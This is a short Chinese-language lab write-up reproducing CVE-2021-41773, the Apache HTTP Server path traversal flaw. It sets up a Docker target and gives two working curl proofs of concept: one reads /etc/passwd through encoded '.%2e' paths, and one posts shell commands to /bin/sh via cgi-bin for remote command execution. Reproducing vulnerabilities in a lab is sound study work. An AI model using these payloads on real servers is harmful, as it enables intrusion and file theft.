前言
10月5号,Apache HTTP Server 项目修补了 CVE-2021-41773,这是 Apache HTTP Server 中的一个路径遍历和文件泄露漏洞,Apache HTTP Server 是一种用于 Unix 和 Windows 的开源 Web 服务器,是使用最广泛的 Web 服务器之一。根据安全公告,CVE-2021-41773 已被广泛用作零日漏洞。Ash Daulton 和 cPanel 安全团队于 9 月 29 日向 Apache HTTP 服务器项目披露了该漏洞。然而,该公告并未指出何时检测到 CVE-2021-41773 的利用,但该利用推动了补丁的加速发布是有道理的。下边我来复现一下这个漏洞。

搭建复现环境
Github上已经有这个cve的开源靶场Dockerfile我们直接克隆到本地然后docker-compose直接就起镜像了。
git clone https://github.com/blasty/CVE-2021-41773
由于他的容器用的镜像源在国内非常慢,这里我们可以修改一下Dockerfile,更换为阿里云。将这一句加在前面就ok了。RUN sed -i s/ deb.debian.org/mirrors.aliyun.com/g /etc/apt/sources.list

然后输入命令docker-compose build && docker-compose up成功起来了,访问http://ip:8080页面正常。

复现过程:
POC1:
curl -s --path-as-is "http://ip:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"


POC2:
curl -s --path-as-is -d 'echo Content-Type: text/plain; echo; id' "http://ip:8080/cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh"

第二个poc直接可以getshell,危害不容小觑。我在复现的时候用windows去执行命令失败了,服务器返回500。离谱……最后用的是kali成功复现。